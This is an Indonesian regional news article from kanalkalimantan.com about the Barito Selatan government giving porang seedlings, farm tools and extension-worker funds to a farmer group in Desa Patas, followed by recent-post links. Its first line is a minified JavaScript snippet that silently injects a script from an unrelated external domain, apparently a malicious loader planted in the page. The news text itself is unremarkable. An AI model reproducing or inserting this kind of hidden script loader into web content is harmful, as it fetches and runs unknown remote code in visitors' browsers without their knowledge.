(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Barito Selatan

Pemkab Barsel Berikan Bantuan Bibit Porang ke Kelompok Tani


KANALKALIMANTAN.COM, BUNTOK – Pemkab Barito Selatan (Barsel) berikan bantuan alat pertanian dan bibit porang kepada kelompok tani yang ada di Desa Patas, Kecamatan Gunung Bintang Awai, Rabu (27/10/2021).

Bupati Barsel H Eddy Raya Samsuri ST mengatakan, pada kesempatan kegiatan ini pihaknya telah menyalurkan bantuan alat pertanian dan bibit porang kepada kelompok tani.

“Bantuan yang ada bisa dimanfaatkan dengan semaksimal mungkin, sehingga bisa memberikan manfaat kembali kepada masyarakat desa,” kata Eddy Raya.

 

 

 

Masih kata orang nomor satu di Barsel itu mengungkapkan selain bantuan alat pertanian dan bibit porang kepada kelompok tani, juga menyalurkan bantuan uang pembinaan kepada para Penyuluh Pertanian Lapangan (PPL).

Baca juga: Sejarah Sumpah Pemuda

“Uang pembinaan kepada PPL ini bisa lebih aktif lagi dalam memberikan penyuluhan kepada para kelompok tani,” ujar Eddy Raya.

Selain penyerahan bantuan juga ada pemberian atau pengenalan hukum langsung dari Pengadilan Negeri Buntok terkait pemanfaatan sebaik mungkin alat pertanian ini.

“Kita harapkan teknologi bantuan alat pertanian ini bisa mempermudah dalam membantu pelaksanaan kegiatan pertanian dan tidak disalahgunakan dalam segi pemanfaatannya, sehingga tidak bersinggungan dengan hukum nantinya,” tegas Eddy Raya.

Kepala Dinas Ketahanan Pangan, Ida Safitri mengatakan, Desa Patas ini bisa menjadi pilot project dalam pembukaan lahan sebanyak kurang lebih 80 hektare dalam pengembangan perkebunan porang.

Baca juga: Ronald Koeman Resmi Dipecat Barcelona

“Tentu kita sangat berharap bantuan yang diberikan kepada kelompok tani menjadi pilot project penanaman porang bisa berhasil, dan kemudian bisa dikembangkan di desa lain di Kabupaten Barsel,” harap Ida.

Ia berharap dengan hadirnya anggota dewan bisa ikut menyerap aspirasi dari para masyarakat yang umumnya banyak berusaha di bidang pertanian.

“Kita sangat berharap kehadiran para anggota dewan bisa lebih mengalokasikan dana aspirasi di sektor pertanian dan perkebunan di Kabupaten Barsel ini,” pungkas Ida. (kanalkalimantan.com/digdo)

Reporter : digdo
Editor : kk


Risa

Recent Posts

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

1 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

2 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

2 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

3 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

5 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

6 jam ago

This website uses cookies.